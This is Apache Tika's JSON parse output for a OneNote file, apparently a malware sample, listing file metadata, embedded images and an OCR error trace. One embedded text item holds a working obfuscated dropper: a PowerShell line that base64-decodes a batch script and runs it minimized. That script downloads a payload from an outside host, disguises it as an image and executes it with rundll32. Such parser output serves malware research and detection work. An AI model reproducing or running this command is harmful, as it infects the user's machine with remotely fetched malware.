[{"onenote:ffvOldestCodeThatHasWrittenToThisFile":"0x2a","onenote:mostRecentAuthors":"admin\u0000","X-TIKA:Parsed-By-Full-Set":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.microsoft.onenote.OneNoteParser","org.apache.tika.parser.image.ImageParser","org.apache.tika.parser.ocr.TesseractOCRParser","org.apache.tika.parser.csv.TextAndCSVParser"],"dc:creator":"admin\u0000","tika_batch_fs:relative_path":"samples/f4657500e56663f83544cf7a0bb83b78526f23437096ba8fe7a61dfcc8572dc1","onenote:cbLegacyFreeSpaceInFreeChunkList":"0x0","onenote:crcName":"0x0","dcterms:modified":"1675767137","onenote:nFileVersionGeneration":"0x45","onenote:cbExpectedFileLength":"0x26d90","onenote:creationTimestamp":"1675679062","onenote:cbLegacyExpectedFileLength":"0x0","onenote:rgbPlaceholder":"0x0","Content-Length":"159152","X-TIKA:digest:MD5":"3409163deb217e80274aa0adbf453192","Content-Type":"application/onenote; format=one","onenote:buildNumberCreated":"0x3f3f7fc6","onenote:ffvLastCodeThatWroteToThisFile":"0x2a","onenote:lastModifiedTimestamp":"1675767137000","onenote:buildNumberNewestWritten":"0x3f3f7fc6","onenote:cTransactionsInLog":"0x1b","onenote:ffvNewestCodeThatHasWrittenToThisFile":"0x2a","onenote:originalAuthors":"admin\u0000","resourceName":"f4657500e56663f83544cf7a0bb83b78526f23437096ba8fe7a61dfcc8572dc1","onenote:ffvOldestCodeThatMayReadThisFile":"0x2a","onenote:grfDebugLogFlags":"0x0","onenote:buildNumberLastWroteToFile":"0x3f3f7fc6","X-TIKA:Parsed-By":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.microsoft.onenote.OneNoteParser"],"tika:file_ext":"","onenote:cbFreeSpaceInFreeChunkList":"0xa1b8","X-TIKA:parse_time_millis":"121151","X-TIKA:embedded_depth":"0","onenote:buildNumberOldestWritten":"0x3f3f7fc6"},{"Transparency Alpha":"nonpremultipled","X-TIKA:embedded_id_path":"/1","tiff:ImageLength":"810","Compression CompressionTypeName":"deflate","Data BitsPerSample":"8 8 8 8","Data PlanarConfiguration":"PixelInterleaved","Dimension VerticalPixelSize":"0.08466683","IHDR":"width=1692, height=810, bitDepth=8, colorType=RGBAlpha, compressionMethod=deflate, filterMethod=adaptive, interlaceMethod=none","iCCP":"profileName=sRGB IEC61966-2.1, compressionMethod=deflate","Chroma ColorSpaceType":"RGB","tiff:BitsPerSample":"8 8 8 8","X-TIKA:digest:MD5":"734ba03175ebc8b8e3ef57bc3ddc9d8e","X-TIKA:embedded_id":"1","Content-Type":"image/png","height":"810","gAMA":"45455","X-TIKA:EXCEPTION:embedded_exception":"org.apache.tika.exception.TikaException: TesseractOCRParser timeout\n\tat org.apache.tika.parser.ocr.TesseractOCRParser.runOCRProcess(TesseractOCRParser.java:439)\n\tat org.apache.tika.parser.ocr.TesseractOCRParser.doOCR(TesseractOCRParser.java:412)\n\tat org.apache.tika.parser.ocr.TesseractOCRParser.parse(TesseractOCRParser.java:299)\n\tat org.apache.tika.parser.ocr.TesseractOCRParser.parse(TesseractOCRParser.java:260)\n\tat org.apache.tika.parser.CompositeParser.parse(CompositeParser.java:298)\n\tat org.apache.tika.parser.CompositeParser.parse(CompositeParser.java:298)\n\tat org.apache.tika.parser.AutoDetectParser.parse(AutoDetectParser.java:197)\n\tat org.apache.tika.parser.ParserDecorator.parse(ParserDecorator.java:152)\n\tat org.apache.tika.parser.DigestingParser.parse(DigestingParser.java:55)\n\tat org.apache.tika.parser.image.AbstractImageParser.parse(AbstractImageParser.java:107)\n\tat org.apache.tika.parser.CompositeParser.parse(CompositeParser.java:298)\n\tat org.apache.tika.parser.CompositeParser.parse(CompositeParser.java:298)\n\tat org.apache.tika.parser.AutoDetectParser.parse(AutoDetectParser.java:197)\n\tat org.apache.tika.parser.ParserDecorator.parse(ParserDecorator.java:152)\n\tat org.apache.tika.parser.DigestingParser.parse(DigestingParser.java:55)\n\tat org.apache.tika.parser.ParserDecorator.parse(ParserDecorator.java:152)\n\tat org.apache.tika.parser.RecursiveParserWrapper$EmbeddedParserDecorator.parse(RecursiveParserWrapper.java:257)\n\tat org.apache.tika.parser.DelegatingParser.parse(DelegatingParser.java:71)\n\tat org.apache.tika.extractor.ParsingEmbeddedDocumentExtractor.parseEmbedded(ParsingEmbeddedDocumentExtractor.java:109)\n\tat org.apache.tika.parser.microsoft.onenote.OneNoteTreeWalker.handleEmbedded(OneNoteTreeWalker.java:362)\n\tat org.apache.tika.parser.microsoft.onenote.OneNoteTreeWalker.walkFileDataStoreObjectReference(OneNoteTreeWalker.java:339)\n\tat org.apache.tika.parser.microsoft.onenote.OneNoteTreeWalker.walkFileNode(OneNoteTreeWalker.java:315)\n\tat org.apache.tika.parser.microsoft.onenote.OneNoteTreeWalker.walkFileNodeList(OneNoteTreeWalker.java:276)\n\tat org.apache.tika.parser.microsoft.onenote.OneNoteTreeWalker.walkFileNode(OneNoteTreeWalker.java:305)\n\tat org.apache.tika.parser.microsoft.onenote.OneNoteTreeWalker.walkFileNodeList(OneNoteTreeWalker.java:276)\n\tat org.apache.tika.parser.microsoft.onenote.OneNoteTreeWalker.walkRootFileNodes(OneNoteTreeWalker.java:157)\n\tat org.apache.tika.parser.microsoft.onenote.OneNoteTreeWalker.walkTree(OneNoteTreeWalker.java:142)\n\tat org.apache.tika.parser.microsoft.onenote.OneNoteParser.parse(OneNoteParser.java:135)\n\tat org.apache.tika.parser.CompositeParser.parse(CompositeParser.java:298)\n\tat org.apache.tika.parser.CompositeParser.parse(CompositeParser.java:298)\n\tat org.apache.tika.parser.AutoDetectParser.parse(AutoDetectParser.java:197)\n\tat org.apache.tika.parser.ParserDecorator.parse(ParserDecorator.java:152)\n\tat org.apache.tika.parser.DigestingParser.parse(DigestingParser.java:55)\n\tat org.apache.tika.parser.RecursiveParserWrapper.parse(RecursiveParserWrapper.java:164)\n\tat org.apache.tika.batch.FileResourceConsumer.parse(FileResourceConsumer.java:375)\n\tat org.apache.tika.batch.fs.RecursiveParserWrapperFSConsumer.processFileResource(RecursiveParserWrapperFSConsumer.java:98)\n\tat org.apache.tika.batch.FileResourceConsumer._processFileResource(FileResourceConsumer.java:152)\n\tat org.apache.tika.batch.FileResourceConsumer.call(FileResourceConsumer.java:87)\n\tat org.apache.tika.batch.FileResourceConsumer.call(FileResourceConsumer.java:50)\n\tat java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)\n\tat java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)\n\tat java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)\n\tat java.base/java.lang.Thread.run(Thread.java:833)\n","pHYs":"pixelsPerUnitXAxis=11811, pixelsPerUnitYAxis=11811, unitSpecifier=meter","Chroma Gamma":"0.45455","Dimension PixelAspectRatio":"1.0","cHRM":"whitePointX=31270, whitePointY=32900, redX=64000, redY=33000, greenX=30000, greenY=60000, blueX=15000, blueY=6000","Compression NumProgressiveScans":"1","Content-Type-Parser-Override":"image/ocr-png","X-TIKA:Parsed-By":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.image.ImageParser","org.apache.tika.parser.ocr.TesseractOCRParser"],"Dimension HorizontalPixelSize":"0.08466683","X-TIKA:EXCEPTION:embedded_parser":"org.apache.tika.parser.DigestingParser","Chroma BlackIsZero":"true","Compression Lossless":"true","X-TIKA:embedded_depth":"1","width":"1692","X-TIKA:parse_time_millis":"120082","Dimension ImageOrientation":"Normal","X-TIKA:embedded_resource_path":"/embedded-1","tiff:ImageWidth":"1692","Chroma NumChannels":"4","Data SampleFormat":"UnsignedIntegral"},{"X-TIKA:Parsed-By":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.csv.TextAndCSVParser"],"X-TIKA:embedded_id_path":"/2","X-TIKA:content_handler":"ToTextContentHandler","X-TIKA:embedded_depth":"1","Content-Encoding":"ISO-8859-1","X-TIKA:parse_time_millis":"2","X-TIKA:content":"\n\n\n\n\n\n\n\n\n\n\n\n\npowershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) > C:\\ProgramData\\in.cmd&&start /min C:\\ProgramData\\in.cmd\n","X-TIKA:embedded_resource_path":"/embedded-2","X-TIKA:digest:MD5":"7b496ed05993dc9e0510941660f450b1","X-TIKA:embedded_id":"2","Content-Type":"text/plain; charset=ISO-8859-1"},{"Transparency Alpha":"nonpremultipled","X-TIKA:embedded_id_path":"/3","tiff:ImageLength":"40","Compression CompressionTypeName":"deflate","Data BitsPerSample":"8 8 8 8","Data PlanarConfiguration":"PixelInterleaved","Dimension VerticalPixelSize":"0.21168502","IHDR":"width=40, height=40, bitDepth=8, colorType=RGBAlpha, compressionMethod=deflate, filterMethod=adaptive, interlaceMethod=none","Chroma ColorSpaceType":"RGB","tiff:BitsPerSample":"8 8 8 8","X-TIKA:digest:MD5":"c2bf462c1311a92660999498f29394bd","X-TIKA:embedded_id":"3","Content-Type":"image/png","height":"40","pHYs":"pixelsPerUnitXAxis=4724, pixelsPerUnitYAxis=4724, unitSpecifier=meter","Dimension PixelAspectRatio":"1.0","sRGB":"Perceptual","Compression NumProgressiveScans":"1","Content-Type-Parser-Override":"image/ocr-png","X-TIKA:Parsed-By":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.image.ImageParser","org.apache.tika.parser.ocr.TesseractOCRParser"],"Dimension HorizontalPixelSize":"0.21168502","Chroma BlackIsZero":"true","Compression Lossless":"true","X-TIKA:embedded_depth":"1","width":"40","X-TIKA:parse_time_millis":"368","Dimension ImageOrientation":"Normal","X-TIKA:embedded_resource_path":"/embedded-3","tiff:ImageWidth":"40","Chroma NumChannels":"4","Data SampleFormat":"UnsignedIntegral"},{"X-TIKA:embedded_id_path":"/4","tiff:ImageLength":"327","Compression CompressionTypeName":"lzw","Chroma ColorSpaceType":"RGB","ImageDescriptor":"imageLeftPosition=0, imageTopPosition=0, imageWidth=1012, imageHeight=327, interlaceFlag=false","X-TIKA:digest:MD5":"b035f23c68cc9673e604fe5472f223d2","X-TIKA:embedded_id":"4","Content-Type":"image/gif","height":"327","Dimension HorizontalPixelOffset":"0","GraphicControlExtension":"disposalMethod=doNotDispose, userInputFlag=false, transparentColorFlag=true, delayTime=0, transparentColorIndex=255","Compression NumProgressiveScans":"1","Content-Type-Parser-Override":"image/ocr-gif","X-TIKA:Parsed-By":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.image.ImageParser","org.apache.tika.parser.ocr.TesseractOCRParser"],"Chroma BlackIsZero":"true","Compression Lossless":"true","X-TIKA:embedded_depth":"1","width":"1012","X-TIKA:parse_time_millis":"683","Dimension ImageOrientation":"Normal","X-TIKA:embedded_resource_path":"/embedded-4","Dimension VerticalPixelOffset":"0","Transparency TransparentIndex":"255","tiff:ImageWidth":"1012","Chroma NumChannels":"4","Data SampleFormat":"Index"}]